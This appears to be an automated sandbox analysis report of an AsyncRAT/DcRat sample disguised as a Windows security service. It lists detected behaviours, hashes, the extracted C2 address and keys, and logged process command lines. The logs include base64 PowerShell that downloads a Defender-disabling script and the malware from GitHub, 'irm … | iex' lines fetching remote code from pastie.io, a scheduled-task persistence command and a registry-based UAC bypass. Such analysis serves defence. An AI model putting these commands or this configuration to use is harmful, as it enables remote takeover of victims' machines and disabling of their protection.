download:

/MalwareTeam/SecurityHealthService/raw/main/SecurityHealthService.exe

Full analysis: https://app.any.run/tasks/8279d01c-3a65-4c50-88dc-678fa6a0edfc
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: February 20, 2024, 17:11:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
asyncrat
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5:

7AC40671822B7D28CDF10DB295DEC6D1

SHA1:

E8A673D9E2992E80697D47DEC70E0918A3FD04CF

SHA256:

78A76137B37A67784921E8588D0361C7A805E39E80BDD229AF881B3EA02FF71A

SSDEEP:

6144:LyzbFHY7RKCnenfVfpP1tBg3jLjZpa4WwmGLSOQhiq7H6/zijz6vfq4EplYqhbk:u9HYNKhfAZonoLSOQUqLJjz6XqK9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • SecurityHealthService.exe (PID: 3288)
      • powershell.exe (PID: 3544)

    • Application was injected by another process

      • dllhost.exe (PID: 2624)
      • dllhost.exe (PID: 1484)
      • dllhost.exe (PID: 3108)
      • dllhost.exe (PID: 2744)
      • dllhost.exe (PID: 2036)
      • dllhost.exe (PID: 2424)
      • dllhost.exe (PID: 3056)

    • Runs injected code in another process

      • SecurityHealthService.exe (PID: 2332)
      • SecurityHealthService.exe (PID: 2668)
      • SecurityHealthService.exe (PID: 3456)
      • SecurityHealthService.exe (PID: 3736)
      • SecurityHealthService.exe (PID: 3088)
      • SecurityHealthService.exe (PID: 3132)
      • SecurityHealthService.exe (PID: 4020)

    • Uses Task Scheduler to autorun other applications

      • SecurityHealthService.exe (PID: 2332)
      • SecurityHealthService.exe (PID: 2668)
      • SecurityHealthService.exe (PID: 3456)
      • SecurityHealthService.exe (PID: 3736)
      • SecurityHealthService.exe (PID: 3088)
      • SecurityHealthService.exe (PID: 3132)
      • SecurityHealthService.exe (PID: 4020)

    • ASYNCRAT has been detected (YARA)

      • SecurityHealthService.exe (PID: 2332)

  • SUSPICIOUS

    • Reads the Internet Settings

      • SecurityHealthService.exe (PID: 2332)
      • powershell.exe (PID: 3544)
      • powershell.exe (PID: 3068)
      • SecurityHealthService.exe (PID: 2668)
      • powershell.exe (PID: 2424)
      • powershell.exe (PID: 3760)
      • powershell.exe (PID: 2612)
      • powershell.exe (PID: 2160)
      • SecurityHealthService.exe (PID: 3456)
      • powershell.exe (PID: 1560)
      • powershell.exe (PID: 3228)
      • SecurityHealthService.exe (PID: 3088)
      • SecurityHealthService.exe (PID: 3736)
      • powershell.exe (PID: 992)
      • powershell.exe (PID: 532)
      • SecurityHealthService.exe (PID: 3132)
      • powershell.exe (PID: 1168)
      • SecurityHealthService.exe (PID: 4020)
      • powershell.exe (PID: 3548)
      • powershell.exe (PID: 1576)

    • Starts CMD.EXE for commands execution

      • SecurityHealthService.exe (PID: 2332)
      • SecurityHealthService.exe (PID: 2668)
      • SecurityHealthService.exe (PID: 3456)
      • SecurityHealthService.exe (PID: 3736)
      • SecurityHealthService.exe (PID: 3088)
      • SecurityHealthService.exe (PID: 3132)
      • SecurityHealthService.exe (PID: 4020)

    • Reads security settings of Internet Explorer

      • SecurityHealthService.exe (PID: 2332)
      • SecurityHealthService.exe (PID: 2668)
      • SecurityHealthService.exe (PID: 3456)
      • SecurityHealthService.exe (PID: 3736)
      • SecurityHealthService.exe (PID: 3088)
      • SecurityHealthService.exe (PID: 3132)
      • SecurityHealthService.exe (PID: 4020)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1656)
      • powershell.exe (PID: 3068)
      • cmd.exe (PID: 2376)
      • powershell.exe (PID: 2424)
      • cmd.exe (PID: 3452)
      • powershell.exe (PID: 2612)
      • cmd.exe (PID: 1692)
      • powershell.exe (PID: 1560)
      • cmd.exe (PID: 2588)
      • powershell.exe (PID: 992)
      • cmd.exe (PID: 1072)
      • powershell.exe (PID: 3548)
      • cmd.exe (PID: 2856)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3544)

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 3068)
      • powershell.exe (PID: 2424)
      • powershell.exe (PID: 2612)
      • powershell.exe (PID: 1560)
      • powershell.exe (PID: 992)
      • powershell.exe (PID: 3548)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 1656)
      • cmd.exe (PID: 2376)
      • cmd.exe (PID: 3452)
      • cmd.exe (PID: 1692)
      • cmd.exe (PID: 2588)
      • cmd.exe (PID: 1072)
      • cmd.exe (PID: 2856)

    • Adds/modifies Windows certificates

      • powershell.exe (PID: 3068)

    • Application launched itself

      • powershell.exe (PID: 3068)
      • powershell.exe (PID: 2424)
      • powershell.exe (PID: 2612)
      • powershell.exe (PID: 1560)
      • powershell.exe (PID: 992)
      • powershell.exe (PID: 3548)

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 3068)
      • powershell.exe (PID: 2424)
      • powershell.exe (PID: 2612)
      • powershell.exe (PID: 1560)
      • powershell.exe (PID: 992)
      • powershell.exe (PID: 3548)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 3068)
      • powershell.exe (PID: 3544)
      • powershell.exe (PID: 2612)
      • powershell.exe (PID: 2424)
      • powershell.exe (PID: 1560)
      • powershell.exe (PID: 3548)
      • powershell.exe (PID: 1576)
      • powershell.exe (PID: 992)

    • Unusual connection from system programs

      • powershell.exe (PID: 3068)
      • powershell.exe (PID: 2612)
      • powershell.exe (PID: 3544)
      • powershell.exe (PID: 2424)
      • powershell.exe (PID: 992)
      • powershell.exe (PID: 1576)
      • powershell.exe (PID: 1560)
      • powershell.exe (PID: 3548)

    • Connects to unusual port

      • SecurityHealthService.exe (PID: 2332)

  • INFO

    • Reads the computer name

      • SecurityHealthService.exe (PID: 3288)
      • SecurityHealthService.exe (PID: 2332)
      • SecurityHealthService.exe (PID: 2668)
      • SecurityHealthService.exe (PID: 3456)
      • SecurityHealthService.exe (PID: 3736)
      • SecurityHealthService.exe (PID: 3088)
      • SecurityHealthService.exe (PID: 3132)
      • SecurityHealthService.exe (PID: 4020)

    • Checks supported languages

      • SecurityHealthService.exe (PID: 3288)
      • SecurityHealthService.exe (PID: 2332)
      • SecurityHealthService.exe (PID: 2668)
      • SecurityHealthService.exe (PID: 3456)
      • SecurityHealthService.exe (PID: 3736)
      • SecurityHealthService.exe (PID: 3088)
      • SecurityHealthService.exe (PID: 3132)
      • SecurityHealthService.exe (PID: 4020)

    • Manual execution by a user

      • SecurityHealthService.exe (PID: 2332)

    • Reads the machine GUID from the registry

      • SecurityHealthService.exe (PID: 2332)
      • SecurityHealthService.exe (PID: 2668)
      • SecurityHealthService.exe (PID: 3456)
      • SecurityHealthService.exe (PID: 3736)
      • SecurityHealthService.exe (PID: 3088)
      • SecurityHealthService.exe (PID: 3132)
      • SecurityHealthService.exe (PID: 4020)

    • The executable file from the user directory is run by the Powershell process

      • SecurityHealthService.exe (PID: 2668)
      • SecurityHealthService.exe (PID: 3456)
      • SecurityHealthService.exe (PID: 3736)
      • SecurityHealthService.exe (PID: 3088)
      • SecurityHealthService.exe (PID: 3132)
      • SecurityHealthService.exe (PID: 4020)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AsyncRat

(PID) Process(2332) SecurityHealthService.exe
C2 (1)147.185.221.18
Ports (1)36538
BotnetDefault
Version1.0.7
Options
AutoRunfalse
MutexFreemasonryMutex_qwqdanchun
InstallFolder%AppData%
BSoDfalse
AntiVMfalse
Certificates
Cert1MIICMDCCAZmgAwIBAgIVAPc9XIx3CUEz22EHDtUB1kyxuY4nMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDERjUmF0IFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIzMDUwODIzMTAzOFoXDTM0MDIxNDIzMTAzOFowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0A...
Server_SignatureVCeCvnd4a9t7T7dtY6+WZTGfgLK1Oy9pXAKVG9u097e2YUV0E4GCcXNGo6q9kvFqF43arxKYWfoLS0f1RvXbo1EHtvhdvBGePc0uH2Id/JLy4/s9S6N/C2SODJDAEtp1s0fy91Q99mhkpImmlU3C3ZP0JBT5lLsq5LoVmlv3mXA=
Keys
AESeda3d9325f90ad232d0cca653a83cb22707acabba87edf2209ba078d1c90c5a2
SaltDcRatByqwqdanchun
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (56.7)
.exe | Win64 Executable (generic) (21.3)
.scr | Windows screen saver (10.1)
.dll | Win32 Dynamic Link Library (generic) (5)
.exe | Win32 Executable (generic) (3.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2061:02:08 13:21:36+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32
LinkerVersion: 48
CodeSize: 294912
InitializedDataSize: 2048
UninitializedDataSize: -
EntryPoint: 0x49fee
OSVersion: 4
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 1.0.0.0
ProductVersionNumber: 1.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: -
CompanyName: -
FileDescription: MasonRootkit
FileVersion: 1.0.0.0
InternalName: MasonRootkit.exe
LegalCopyright: Copyright © 2024
LegalTrademarks: -
OriginalFileName: MasonRootkit.exe
ProductName: MasonRootkit
ProductVersion: 1.0.0.0
AssemblyVersion: 1.0.0.0
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
111
Monitored processes
50
Malicious processes
19
Suspicious processes
13

Behavior graph

Click at the process to see the details
start securityhealthservice.exe no specs schtasks.exe no specs #ASYNCRAT securityhealthservice.exe dllhost.exe cmd.exe no specs schtasks.exe no specs powershell.exe schtasks.exe no specs powershell.exe securityhealthservice.exe dllhost.exe cmd.exe no specs schtasks.exe no specs schtasks.exe no specs powershell.exe powershell.exe no specs securityhealthservice.exe dllhost.exe cmd.exe no specs schtasks.exe no specs schtasks.exe no specs powershell.exe powershell.exe no specs securityhealthservice.exe dllhost.exe cmd.exe no specs schtasks.exe no specs schtasks.exe no specs powershell.exe powershell.exe no specs securityhealthservice.exe dllhost.exe cmd.exe no specs schtasks.exe no specs schtasks.exe no specs powershell.exe powershell.exe no specs securityhealthservice.exe dllhost.exe cmd.exe no specs schtasks.exe no specs schtasks.exe no specs powershell.exe powershell.exe no specs securityhealthservice.exe dllhost.exe schtasks.exe no specs schtasks.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
240"SCHTASKS.exe" /create /tn "$77SecurityHealthService.exe" /tr "'C:\Users\admin\Desktop\SecurityHealthService.exe'" /sc onlogon /rl HIGHESTC:\Windows\System32\schtasks.exeSecurityHealthService.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
532"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAGEAbQBkAHIAMQBpAHkAbAB0AFQAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAE0AYQBsAHcAYQByAGUAVABlAGEAbQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC8AcgBhAHcALwBtAGEAaQBuAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8ATQBhAGwAdwBhAHIAZQBUAGUAYQBtAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
992powershell "irm pastie.io/raw/fgaazw | iex"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1072"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"C:\Windows\System32\cmd.exeSecurityHealthService.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1168"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAGEAbQBkAHIAMQBpAHkAbAB0AFQAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAE0AYQBsAHcAYQByAGUAVABlAGEAbQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC8AcgBhAHcALwBtAGEAaQBuAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8ATQBhAGwAdwBhAHIAZQBUAGUAYQBtAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1484C:\Windows\System32\dllhost.exe /Processid:{83650570-fb16-48ee-8712-9b6ee4eecf45}C:\Windows\System32\dllhost.exe
winlogon.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
1560powershell "irm pastie.io/raw/fgaazw | iex"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1576powershell "irm pastie.io/raw/fgaazw | iex"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1656"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"C:\Windows\System32\cmd.exeSecurityHealthService.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1692"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"C:\Windows\System32\cmd.exeSecurityHealthService.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
70 120
Read events
69 759
Write events
349
Delete events
12

Modification events

(PID) Process:(3288) SecurityHealthService.exeKey:HKEY_CURRENT_USER\Software\didirun
Operation:writeName:didi
Value:
yes
(PID) Process:(3288) SecurityHealthService.exeKey:HKEY_CURRENT_USER\Environment
Operation:writeName:windir
Value:
"C:\Users\admin\Desktop\SecurityHealthService.exe" ;#
(PID) Process:(3288) SecurityHealthService.exeKey:HKEY_CURRENT_USER\Environment
Operation:writeName:windir
Value:
C:\Windows
(PID) Process:(2332) SecurityHealthService.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\$77config\pid
Operation:writeName:fyys1xat.twf
Value:
2332
(PID) Process:(2332) SecurityHealthService.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths
Operation:writeName:pqvowa50.02s
Value:
C:\Users\admin\Desktop\SecurityHealthService.exe
(PID) Process:(2332) SecurityHealthService.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2332) SecurityHealthService.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2332) SecurityHealthService.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2332) SecurityHealthService.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2624) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\$77config\pid
Operation:writeName:svc32
Value:
2624
Executable files
1
Suspicious files
30
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3068powershell.exeC:\Users\admin\AppData\Local\Temp\worjequx.oj4.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
